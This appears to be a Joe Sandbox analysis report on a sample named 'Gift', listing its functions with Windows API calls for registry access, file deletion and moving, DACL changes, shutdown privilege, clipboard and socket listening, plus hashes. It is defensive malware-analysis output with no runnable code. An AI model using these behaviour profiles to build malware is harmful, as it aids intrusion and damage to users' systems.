                                                                          • API ID: Close$ConnectCreateRegistryValue
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 536824911-966354055
                                                                          • Opcode ID: 54556d0378921abc2f9a2c0bd5e95d592f00cbd58411890b19b7c4d5843a95b2
                                                                          • Instruction ID: 0a3067681e43cc723efa691fd124f289262fcd1c0fd9e103bce35608aebebd6d
                                                                          • Opcode Fuzzy Hash: 54556d0378921abc2f9a2c0bd5e95d592f00cbd58411890b19b7c4d5843a95b2
                                                                          • Instruction Fuzzy Hash: 970264712106119FCB15EF25C885E2AB7E5FF88724F048859F99A9B3A2CB30EC15CF91
                                                                          Function 0033F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0033F756
                                                                          • _wcscmp.LIBCMT ref: 0033F76B
                                                                          • _wcscmp.LIBCMT ref: 0033F782
                                                                            • Part of subcall function 00334875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00334890
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0033F7B1
                                                                          • FindClose.KERNEL32(00000000), ref: 0033F7BC
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0033F7D8
                                                                          • _wcscmp.LIBCMT ref: 0033F7FF
                                                                          • _wcscmp.LIBCMT ref: 0033F816
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0033F828
                                                                          • SetCurrentDirectoryW.KERNEL32(0038B578), ref: 0033F846
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0033F850
                                                                          • FindClose.KERNEL32(00000000), ref: 0033F85D
                                                                          • FindClose.KERNEL32(00000000), ref: 0033F86F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*$j3
                                                                          • API String ID: 1824444939-2549971785
                                                                          • Opcode ID: b8c295fb574b33501ce74ce82ba1d61e146141895b0952d48b068036273e7a02
                                                                          • Instruction ID: 1e5ed0909848ec96b3a99c07399b40f0865b1e5e9754f6b03a498ec73f1d078c
                                                                          • Opcode Fuzzy Hash: b8c295fb574b33501ce74ce82ba1d61e146141895b0952d48b068036273e7a02
                                                                          • Instruction Fuzzy Hash: 8B31163190021E6FDB1AEFB4DC89AEFB7AC9F09360F5045B5F904A61A0DB70CE458B60
                                                                          Function 003288CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328E3C
                                                                            • Part of subcall function 00328E20: GetLastError.KERNEL32(?,00328900,?,?,?), ref: 00328E46
                                                                            • Part of subcall function 00328E20: GetProcessHeap.KERNEL32(00000008,?,?,00328900,?,?,?), ref: 00328E55
                                                                            • Part of subcall function 00328E20: HeapAlloc.KERNEL32(00000000,?,00328900,?,?,?), ref: 00328E5C
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00328E73
                                                                            • Part of subcall function 00328EBD: GetProcessHeap.KERNEL32(00000008,00328916,00000000,00000000,?,00328916,?), ref: 00328EC9
                                                                            • Part of subcall function 00328EBD: HeapAlloc.KERNEL32(00000000,?,00328916,?), ref: 00328ED0
                                                                            • Part of subcall function 00328EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00328916,?), ref: 00328EE1
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00328931
                                                                          • _memset.LIBCMT ref: 00328946
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00328965
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00328976
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 003289B3
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003289CF
                                                                          • GetLengthSid.ADVAPI32(?), ref: 003289EC
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003289FB
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00328A02
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00328A23
                                                                          • CopySid.ADVAPI32(00000000), ref: 00328A2A
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00328A5B
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00328A81
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00328A95
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 9d7decafb541fcb92285c52b290dbd1f43274fb7078cc814ee58a7000e713406
                                                                          • Instruction ID: d5f7bdcf8ec92477c49182ac03dcb58974e30e5c5c986926c9aa2f97763b3627
                                                                          • Opcode Fuzzy Hash: 9d7decafb541fcb92285c52b290dbd1f43274fb7078cc814ee58a7000e713406
                                                                          • Instruction Fuzzy Hash: DB615875901219FFDF06DFA5EC89EEEBB79FF04300F04812AE915A6290DB719A05CB60
                                                                          Function 00350A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0035147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0035040D,?,?), ref: 00351491
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350B0C
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00350BAB
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00350C43
                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00350E82
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00350E8F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1240663315-0
                                                                          • Opcode ID: cde7c545faea7f1fdd0b146b9a9780bd9091d5eb578c0aa4abb81b8837bcae93
                                                                          • Instruction ID: bf78a6b462653fe1559400bfc40154e94faf9b85731d9aa44dee786029d95bd9
                                                                          • Opcode Fuzzy Hash: cde7c545faea7f1fdd0b146b9a9780bd9091d5eb578c0aa4abb81b8837bcae93
                                                                          • Instruction Fuzzy Hash: 61E16C31204210AFCB19DF29C995E2BBBE9EF89314F04896DF889DB261DB31EC15CB51
                                                                          Function 0033443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00334451
                                                                          • __swprintf.LIBCMT ref: 0033445E
                                                                            • Part of subcall function 002F38C8: __woutput_l.LIBCMT ref: 002F3921
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00334488
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00334494
                                                                          • LockResource.KERNEL32(00000000), ref: 003344A1
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 003344C1
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 003344D3
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 003344E2
                                                                          • LockResource.KERNEL32(?), ref: 003344EE
                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0033454F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                          • String ID:
                                                                          • API String ID: 1433390588-0
                                                                          • Opcode ID: 9249e2fb7682f2010ff91a0863200cfe42d24f32a12808c8816209b7d41ab5e5
                                                                          • Instruction ID: 89565e752103a71abe2ac7c2a41933e449bb608f351fd1c374e62cb0359c1f6e
                                                                          • Opcode Fuzzy Hash: 9249e2fb7682f2010ff91a0863200cfe42d24f32a12808c8816209b7d41ab5e5
                                                                          • Instruction Fuzzy Hash: 0531A17190121AABDB169F60ED99ABB7BACEF05341F048825F916D6150E774EA20CB60
                                                                          Function 00344830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: 07d1630a74f72673deaffd8e0c9e098a0595788338ca852daaa7c9ecb5bfc395
                                                                          • Instruction ID: d5d85a7d410d853e8e6302e5fda96e67397319b858cc078632bc6d82a2832a17
                                                                          • Opcode Fuzzy Hash: 07d1630a74f72673deaffd8e0c9e098a0595788338ca852daaa7c9ecb5bfc395
                                                                          • Instruction Fuzzy Hash: A12195312112109FEB17AF60EC5AB2E77ADEF48711F01C425F9469B2A1DBB1AD10CB54
                                                                          Function 00333CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002F0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E2A58,?,00008000), ref: 002F02A4
                                                                            • Part of subcall function 00334FEC: GetFileAttributesW.KERNEL32(?,00333BFE), ref: 00334FED
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00333D96
                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00333E3E
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00333E51
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00333E6E
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00333E90
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00333EAC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                          • String ID: \*.*
                                                                          • API String ID: 4002782344-1173974218
                                                                          • Opcode ID: 63fa6558fd8440a2edb3018da747389358612b04e6c31ff1e86174e84f4da904
                                                                          • Instruction ID: 9b84b724992e6aa59402fa8b5e62ddfdab5a7122edb4127dfe625d25a00f03f3
                                                                          • Opcode Fuzzy Hash: 63fa6558fd8440a2edb3018da747389358612b04e6c31ff1e86174e84f4da904
                                                                          • Instruction Fuzzy Hash: DA51813284115DAACF16EBA1CA92DEEB779AF10301F608165E442B7192EF316F19CF61
                                                                          Function 0033FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0033FA83
                                                                          • FindClose.KERNEL32(00000000), ref: 0033FB96
                                                                            • Part of subcall function 002D52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002D52E6
                                                                          • Sleep.KERNEL32(0000000A), ref: 0033FAB3
                                                                          • _wcscmp.LIBCMT ref: 0033FAC7
                                                                          • _wcscmp.LIBCMT ref: 0033FAE2
                                                                          • FindNextFileW.KERNEL32(?,?), ref: 0033FB80
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                          • String ID: *.*
                                                                          • API String ID: 2185952417-438819550
                                                                          • Opcode ID: de8058c8bb6c47ea8df0bf7756e75c2edfffefd6354da45fa1b8bfde74e5bbfa
                                                                          • Instruction ID: 7cb1ecb4b0e100e55275c534c461de10744511519a48611713ee703659bd33cb
                                                                          • Opcode Fuzzy Hash: de8058c8bb6c47ea8df0bf7756e75c2edfffefd6354da45fa1b8bfde74e5bbfa
                                                                          • Instruction Fuzzy Hash: D9418E71D4021A9FCF16DF64CC99AEEBBB9EF05350F548466E814A22A1EB309A54CF50
                                                                          Function 00335778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00329399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003293E3
                                                                            • Part of subcall function 00329399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00329410
                                                                            • Part of subcall function 00329399: GetLastError.KERNEL32 ref: 0032941D
                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003357B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                          • String ID: $@$SeShutdownPrivilege
                                                                          • API String ID: 2234035333-194228
                                                                          • Opcode ID: 425f44eeedef200ff253b09cdbcdce89595cd3c5ec9bb6de6c8645b15bb4eee2
                                                                          • Instruction ID: 270ae3319682e7c0f15666a0d79c46703e12c6718c473e6d4d868e2dff7fc1e4
                                                                          • Opcode Fuzzy Hash: 425f44eeedef200ff253b09cdbcdce89595cd3c5ec9bb6de6c8645b15bb4eee2
                                                                          • Instruction Fuzzy Hash: 74012631795712EAE72B62A4DCCBBBB725CEB04740F214429F913D60E2EA905C0081A0
                                                                          Function 0034696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003469C7
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003469D6
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003469F2
                                                                          • listen.WSOCK32(00000000,00000005), ref: 00346A01
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346A1B
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00346A2F
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                          • String ID:
                                                                          • API String ID: 1279440585-0
                                                                          • Opcode ID: a55a634fb9861dea5558d0403bbfb00e16583b848cbb02963378a8f9602d84cf
                                                                          • Instruction ID: 2ee109808e15c77e54ea7181a79f3ef8f261be5ed7dbe5b235aa93ee6308f67a
                                                                          • Opcode Fuzzy Hash: a55a634fb9861dea5558d0403bbfb00e16583b848cbb02963378a8f9602d84cf
                                                                          • Instruction Fuzzy Hash: F621D0702006109FCB01EF64C98AA6EB7F9EF49720F118559E856AB391CBB0BC01CB91
                                                                          Function 002D1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 002D1DD6
                                                                          • GetSysColor.USER32(0000000F), ref: 002D1E2A
                                                                          • SetBkColor.GDI32(?,00000000), ref: 002D1E3D
                                                                            • Part of subcall function 002D166C: DefDlgProcW.USER32(?,00000020,?), ref: 002D16B4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ColorProc$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 3744519093-0
                                                                          • Opcode ID: 8cd9d3980b204e0d6ba57af0eec09b453004df3ae835e1ba0c03fcba806029f0
                                                                          • Instruction ID: c1cb0d0face967c6d9a664f39055f57bc90b3e868c5f4f067af046b2b86b5c63
                                                                          • Opcode Fuzzy Hash: 8cd9d3980b204e0d6ba57af0eec09b453004df3ae835e1ba0c03fcba806029f0
                                                                          • Instruction Fuzzy Hash: B1A1787013A605BEE62EAF699C59EBB765EDF42301F25010BF442CABD1CB618D31C276
                                                                          Function 0033C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0033C329
                                                                          • _wcscmp.LIBCMT ref: 0033C359
                                                                          • _wcscmp.LIBCMT ref: 0033C36E
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0033C37F
                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0033C3AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 2387731787-0
                                                                          • Opcode ID: 1673c7826a3e36a9e2098b0797562371027d385369b0f74875ea6e62f907d217
                                                                          • Instruction ID: 24a2251459ca5bae891a2b51855e34fcd89e05f8688b9bf0c19c4f50e005c58a
                                                                          • Opcode Fuzzy Hash: 1673c7826a3e36a9e2098b0797562371027d385369b0f74875ea6e62f907d217
                                                                          • Instruction Fuzzy Hash: 2C519D356146028FC719DF68C4D19AAB3E8FF49320F11862DE95A97361DB34ED14CB91
                                                                          Function 00346E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00348475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003484A0
                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00346E89
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346EB2
                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 00346EEB
                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00346EF8
                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00346F0C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 99427753-0
                                                                          • Opcode ID: 3bc2d6840acce2ea0bf6c8738bbb405aa425158d9ce80e1b949d254477544000
                                                                          • Instruction ID: d11ce34b708f7cafe3174143abaf23309d8f696dbece80c55ea189c68cac6be3
                                                                          • Opcode Fuzzy Hash: 3bc2d6840acce2ea0bf6c8738bbb405aa425158d9ce80e1b949d254477544000
                                                                          • Instruction Fuzzy Hash: CC41EF75610210AFDB11BF64DC8BF6E73E9AF48714F008459F946AB3D2CA70AD108FA2
                                                                          Function 003559B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: 2ec175def26a96450139d2549f2fe8a5b010fe699865079677ad81e43bbde9cc
                                                                          • Instruction ID: a2290b877169e9f926dc8c4772aa6ed41f21810eefbec949d663769814f816ef
